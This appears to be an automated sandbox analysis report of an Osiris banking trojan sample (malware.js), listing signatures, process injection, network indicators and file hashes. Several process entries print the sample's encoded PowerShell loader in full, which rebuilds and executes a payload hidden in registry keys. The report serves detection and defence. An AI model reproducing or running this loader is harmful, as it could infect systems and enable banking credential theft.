Malware Analysis Report

2025-01-22 13:34

Sample ID 210722-837q3gwvfx
Target malware.js
SHA256 d0ac1b89cd4522882989b06c18ef2b80b05e07d64de1f562f79e2d631536fed3
Tags
osiris banker botnet
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d0ac1b89cd4522882989b06c18ef2b80b05e07d64de1f562f79e2d631536fed3

Threat Level: Known bad

The file malware.js was found to be: Known bad.

Malicious Activity Summary

osiris banker botnet

Osiris

Executes dropped EXE

Uses Tor communications

Looks up external IP address via web service

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious behavior: CmdExeWriteProcessMemorySpam

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2021-07-22 09:26

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2021-07-22 09:26

Reported

2021-07-22 09:32

Platform

win7v20210410

Max time kernel

240s

Max time network

272s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\malware.js

Signatures

Enumerates physical storage devices

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\malware.js

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "PAAjACAAdQB2AHgAdgByAGwAIAAjAD4AJAB1AD0AJABlAG4AdgA6AFUAcwBlAHIATgBhAG0AZQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAA3ADAAMAA7ACQAaQArACsAKQB7ACQAYwA9ACIASABLAEMAVQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAIgArACQAdQArACIAMQAiADsAVAByAHkAewAkAGEAPQAkAGEAKwAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAHAAYQB0AGgAIAAkAGMAKQAuACQAaQB9AEMAYQB0AGMAaAB7AH0AfQA7AGYAdQBuAGMAdABpAG8AbgAgAGMAaABiAGEAewBbAGMAbQBkAGwAZQB0AGIAaQBuAGQAaQBuAGcAKAApAF0AcABhAHIAYQBtACgAWwBwAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACkAXQBbAFMAdAByAGkAbgBnAF0AJABoAHMAKQA7ACQAQgB5AHQAZQBzACAAPQAgAFsAYgB5AHQAZQBbAF0AXQA6ADoAbgBlAHcAKAAkAGgAcwAuAEwAZQBuAGcAdABoACAALwAgADIAKQA7AGYAbwByACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGgAcwAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwA9ADIAKQB7ACQAQgB5AHQAZQBzAFsAJABpAC8AMgBdACAAPQAgAFsAYwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgB5AHQAZQAoACQAaABzAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAGkALAAgADIAKQAsACAAMQA2ACkAfQAkAEIAeQB0AGUAcwB9ADsAJABpACAAPQAgADAAOwBXAGgAaQBsAGUAIAAoACQAVAByAHUAZQApAHsAJABpACsAKwA7ACQAawBvACAAPQAgAFsAbQBhAHQAaABdADoAOgBTAHEAcgB0ACgAJABpACkAOwBpAGYAIAAoACQAawBvACAALQBlAHEAIAAxADAAMAAwACkAewAgAGIAcgBlAGEAawB9AH0AWwBiAHkAdABlAFsAXQBdACQAYgAgAD0AIABjAGgAYgBhACgAJABhAC4AcgBlAHAAbABhAGMAZQAoACIAIwAiACwAJABrAG8AKQApADsAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAGIAKQA7AFsATQBvAGQAZQBdADoAOgBTAGUAdAB1AHAAKAApADsA "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "PAAjACAAdQB2AHgAdgByAGwAIAAjAD4AJAB1AD0AJABlAG4AdgA6AFUAcwBlAHIATgBhAG0AZQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAA3ADAAMAA7ACQAaQArACsAKQB7ACQAYwA9ACIASABLAEMAVQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAIgArACQAdQArACIAMQAiADsAVAByAHkAewAkAGEAPQAkAGEAKwAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAHAAYQB0AGgAIAAkAGMAKQAuACQAaQB9AEMAYQB0AGMAaAB7AH0AfQA7AGYAdQBuAGMAdABpAG8AbgAgAGMAaABiAGEAewBbAGMAbQBkAGwAZQB0AGIAaQBuAGQAaQBuAGcAKAApAF0AcABhAHIAYQBtACgAWwBwAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACkAXQBbAFMAdAByAGkAbgBnAF0AJABoAHMAKQA7ACQAQgB5AHQAZQBzACAAPQAgAFsAYgB5AHQAZQBbAF0AXQA6ADoAbgBlAHcAKAAkAGgAcwAuAEwAZQBuAGcAdABoACAALwAgADIAKQA7AGYAbwByACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGgAcwAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwA9ADIAKQB7ACQAQgB5AHQAZQBzAFsAJABpAC8AMgBdACAAPQAgAFsAYwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgB5AHQAZQAoACQAaABzAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAGkALAAgADIAKQAsACAAMQA2ACkAfQAkAEIAeQB0AGUAcwB9ADsAJABpACAAPQAgADAAOwBXAGgAaQBsAGUAIAAoACQAVAByAHUAZQApAHsAJABpACsAKwA7ACQAawBvACAAPQAgAFsAbQBhAHQAaABdADoAOgBTAHEAcgB0ACgAJABpACkAOwBpAGYAIAAoACQAawBvACAALQBlAHEAIAAxADAAMAAwACkAewAgAGIAcgBlAGEAawB9AH0AWwBiAHkAdABlAFsAXQBdACQAYgAgAD0AIABjAGgAYgBhACgAJABhAC4AcgBlAHAAbABhAGMAZQAoACIAIwAiACwAJABrAG8AKQApADsAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAGIAKQA7AFsATQBvAGQAZQBdADoAOgBTAGUAdAB1AHAAKAApADsA "

Network

N/A

Files

memory/1536-59-0x0000000000000000-mapping.dmp

memory/316-60-0x0000000000000000-mapping.dmp

memory/316-61-0x0000000075561000-0x0000000075563000-memory.dmp

memory/316-62-0x0000000000940000-0x0000000000941000-memory.dmp

memory/316-63-0x0000000004810000-0x0000000004811000-memory.dmp

memory/316-64-0x00000000024E0000-0x00000000024E1000-memory.dmp

memory/316-65-0x0000000002200000-0x0000000002E4A000-memory.dmp

memory/316-66-0x0000000002790000-0x0000000002791000-memory.dmp

memory/316-69-0x0000000005740000-0x0000000005741000-memory.dmp

memory/316-74-0x00000000056D0000-0x00000000056D1000-memory.dmp

memory/316-75-0x0000000006120000-0x0000000006121000-memory.dmp

memory/316-82-0x0000000006290000-0x0000000006291000-memory.dmp

memory/316-83-0x000000007EF30000-0x000000007EF31000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2021-07-22 09:26

Reported

2021-07-22 09:32

Platform

win10v20210408

Max time kernel

300s

Max time network

260s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\malware.js

Signatures

Osiris

banker botnet osiris

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Uses Tor communications

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3724 set thread context of 788 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 656 wrote to memory of 3136 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\cmd.exe
PID 656 wrote to memory of 3136 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\cmd.exe
PID 3136 wrote to memory of 3724 N/A C:\Windows\System32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3136 wrote to memory of 3724 N/A C:\Windows\System32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3136 wrote to memory of 3724 N/A C:\Windows\System32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3724 wrote to memory of 3384 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
PID 3724 wrote to memory of 3384 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
PID 3724 wrote to memory of 3384 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
PID 3724 wrote to memory of 788 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
PID 3724 wrote to memory of 788 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
PID 3724 wrote to memory of 788 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
PID 3724 wrote to memory of 788 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
PID 3724 wrote to memory of 788 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
PID 3724 wrote to memory of 788 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
PID 3724 wrote to memory of 788 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
PID 3724 wrote to memory of 788 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
PID 3724 wrote to memory of 788 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
PID 3724 wrote to memory of 788 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
PID 788 wrote to memory of 2196 N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe
PID 788 wrote to memory of 2196 N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\malware.js

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "PAAjACAAdQB2AHgAdgByAGwAIAAjAD4AJAB1AD0AJABlAG4AdgA6AFUAcwBlAHIATgBhAG0AZQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAA3ADAAMAA7ACQAaQArACsAKQB7ACQAYwA9ACIASABLAEMAVQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAIgArACQAdQArACIAMQAiADsAVAByAHkAewAkAGEAPQAkAGEAKwAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAHAAYQB0AGgAIAAkAGMAKQAuACQAaQB9AEMAYQB0AGMAaAB7AH0AfQA7AGYAdQBuAGMAdABpAG8AbgAgAGMAaABiAGEAewBbAGMAbQBkAGwAZQB0AGIAaQBuAGQAaQBuAGcAKAApAF0AcABhAHIAYQBtACgAWwBwAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACkAXQBbAFMAdAByAGkAbgBnAF0AJABoAHMAKQA7ACQAQgB5AHQAZQBzACAAPQAgAFsAYgB5AHQAZQBbAF0AXQA6ADoAbgBlAHcAKAAkAGgAcwAuAEwAZQBuAGcAdABoACAALwAgADIAKQA7AGYAbwByACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGgAcwAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwA9ADIAKQB7ACQAQgB5AHQAZQBzAFsAJABpAC8AMgBdACAAPQAgAFsAYwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgB5AHQAZQAoACQAaABzAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAGkALAAgADIAKQAsACAAMQA2ACkAfQAkAEIAeQB0AGUAcwB9ADsAJABpACAAPQAgADAAOwBXAGgAaQBsAGUAIAAoACQAVAByAHUAZQApAHsAJABpACsAKwA7ACQAawBvACAAPQAgAFsAbQBhAHQAaABdADoAOgBTAHEAcgB0ACgAJABpACkAOwBpAGYAIAAoACQAawBvACAALQBlAHEAIAAxADAAMAAwACkAewAgAGIAcgBlAGEAawB9AH0AWwBiAHkAdABlAFsAXQBdACQAYgAgAD0AIABjAGgAYgBhACgAJABhAC4AcgBlAHAAbABhAGMAZQAoACIAIwAiACwAJABrAG8AKQApADsAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAGIAKQA7AFsATQBvAGQAZQBdADoAOgBTAGUAdAB1AHAAKAApADsA "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "PAAjACAAdQB2AHgAdgByAGwAIAAjAD4AJAB1AD0AJABlAG4AdgA6AFUAcwBlAHIATgBhAG0AZQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAA3ADAAMAA7ACQAaQArACsAKQB7ACQAYwA9ACIASABLAEMAVQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAIgArACQAdQArACIAMQAiADsAVAByAHkAewAkAGEAPQAkAGEAKwAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAHAAYQB0AGgAIAAkAGMAKQAuACQAaQB9AEMAYQB0AGMAaAB7AH0AfQA7AGYAdQBuAGMAdABpAG8AbgAgAGMAaABiAGEAewBbAGMAbQBkAGwAZQB0AGIAaQBuAGQAaQBuAGcAKAApAF0AcABhAHIAYQBtACgAWwBwAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACkAXQBbAFMAdAByAGkAbgBnAF0AJABoAHMAKQA7ACQAQgB5AHQAZQBzACAAPQAgAFsAYgB5AHQAZQBbAF0AXQA6ADoAbgBlAHcAKAAkAGgAcwAuAEwAZQBuAGcAdABoACAALwAgADIAKQA7AGYAbwByACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGgAcwAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwA9ADIAKQB7ACQAQgB5AHQAZQBzAFsAJABpAC8AMgBdACAAPQAgAFsAYwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgB5AHQAZQAoACQAaABzAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAGkALAAgADIAKQAsACAAMQA2ACkAfQAkAEIAeQB0AGUAcwB9ADsAJABpACAAPQAgADAAOwBXAGgAaQBsAGUAIAAoACQAVAByAHUAZQApAHsAJABpACsAKwA7ACQAawBvACAAPQAgAFsAbQBhAHQAaABdADoAOgBTAHEAcgB0ACgAJABpACkAOwBpAGYAIAAoACQAawBvACAALQBlAHEAIAAxADAAMAAwACkAewAgAGIAcgBlAGEAawB9AH0AWwBiAHkAdABlAFsAXQBdACQAYgAgAD0AIABjAGgAYgBhACgAJABhAC4AcgBlAHAAbABhAGMAZQAoACIAIwAiACwAJABrAG8AKQApADsAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAGIAKQA7AFsATQBvAGQAZQBdADoAOgBTAGUAdAB1AHAAKAApADsA "

C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"

C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"

C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe

"C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe"

Network

Country Destination Domain Proto
N/A 193.23.244.244:80 193.23.244.244 tcp
N/A 8.8.8.8:53 api.ipify.org udp
N/A 50.16.246.238:443 api.ipify.org tcp
N/A 70.63.170.86:80 70.63.170.86 tcp
N/A 96.244.79.89:443 tcp
N/A 8.8.8.8:53 time-a.nist.gov udp
N/A 129.6.15.28:13 time-a.nist.gov tcp
N/A 51.89.143.158:80 51.89.143.158 tcp
N/A 54.36.237.163:80 54.36.237.163 tcp
N/A 37.153.16.170:80 37.153.16.170 tcp
N/A 188.68.37.135:80 188.68.37.135 tcp
N/A 199.249.230.122:80 199.249.230.122 tcp
N/A 192.236.193.142:443 tcp
N/A 5.100.139.8:80 5.100.139.8 tcp
N/A 199.249.230.71:443 tcp
N/A 172.107.92.18:80 172.107.92.18 tcp
N/A 199.249.230.102:80 199.249.230.102 tcp
N/A 31.207.89.49:80 31.207.89.49 tcp
N/A 198.46.166.157:443 tcp
N/A 91.223.82.156:80 91.223.82.156 tcp
N/A 195.201.141.166:80 195.201.141.166 tcp

Files

memory/3136-114-0x0000000000000000-mapping.dmp

memory/3724-115-0x0000000000000000-mapping.dmp

memory/3724-118-0x0000000004A70000-0x0000000004A71000-memory.dmp

memory/3724-119-0x0000000007130000-0x0000000007131000-memory.dmp

memory/3724-121-0x0000000004A62000-0x0000000004A63000-memory.dmp

memory/3724-120-0x0000000004A60000-0x0000000004A61000-memory.dmp

memory/3724-122-0x0000000007080000-0x0000000007081000-memory.dmp

memory/3724-123-0x0000000007930000-0x0000000007931000-memory.dmp

memory/3724-124-0x0000000007AA0000-0x0000000007AA1000-memory.dmp

memory/3724-125-0x0000000007B10000-0x0000000007B11000-memory.dmp

memory/3724-126-0x0000000007F20000-0x0000000007F21000-memory.dmp

memory/3724-127-0x00000000082D0000-0x00000000082D1000-memory.dmp

memory/3724-128-0x0000000008250000-0x0000000008251000-memory.dmp

memory/3724-133-0x00000000092C0000-0x00000000092C1000-memory.dmp

memory/3724-134-0x0000000008F90000-0x0000000008F91000-memory.dmp

memory/3724-135-0x0000000009010000-0x0000000009011000-memory.dmp

memory/3724-136-0x0000000009860000-0x0000000009861000-memory.dmp

memory/3724-137-0x0000000009090000-0x0000000009092000-memory.dmp

memory/3724-140-0x0000000009470000-0x00000000095BC000-memory.dmp

memory/788-143-0x0000000000400000-0x0000000000456000-memory.dmp

memory/788-144-0x0000000000401698-mapping.dmp

memory/788-150-0x0000000003200000-0x000000000334A000-memory.dmp

memory/3724-151-0x0000000004A63000-0x0000000004A64000-memory.dmp

memory/788-149-0x0000000000400000-0x0000000000456000-memory.dmp

memory/2196-153-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe

MD5 b4cd27f2b37665f51eb9fe685ec1d373
SHA1 7f08febf0fdb7fc9f8bf35a10fb11e7de431abe0
SHA256 91f1023142b7babf6ff75dad984c2a35bde61dc9e61f45483f4b65008576d581
SHA512 e025f65224d78f5fd0abebe281ac0d44a385b2641e367cf39eed6aefada20a112ac47f94d7febc4424f1db6a6947bac16ff83ef93a8d745b3cddfdbe64c49a1e

C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe

MD5 b4cd27f2b37665f51eb9fe685ec1d373
SHA1 7f08febf0fdb7fc9f8bf35a10fb11e7de431abe0
SHA256 91f1023142b7babf6ff75dad984c2a35bde61dc9e61f45483f4b65008576d581
SHA512 e025f65224d78f5fd0abebe281ac0d44a385b2641e367cf39eed6aefada20a112ac47f94d7febc4424f1db6a6947bac16ff83ef93a8d745b3cddfdbe64c49a1e

C:\Users\Admin\AppData\Local\Temp\x64btit.txt

MD5 14f8904cf8d36877990fa4f0743a8396
SHA1 8429f1370f2f08ddb81a06b16e0f40c309309ea3
SHA256 42fe128c1f7cdef6532a8228d19a21dead95fef57ed326d64cb3833d347081c9
SHA512 f7f6dcb8b0145362610e66b03ba55ad5fb9304ec5a713d8873b6b22b993d5ce7d248354adac9d285dd1d22a1e8678ff821d748cb8662fe39704a3ea8f8045469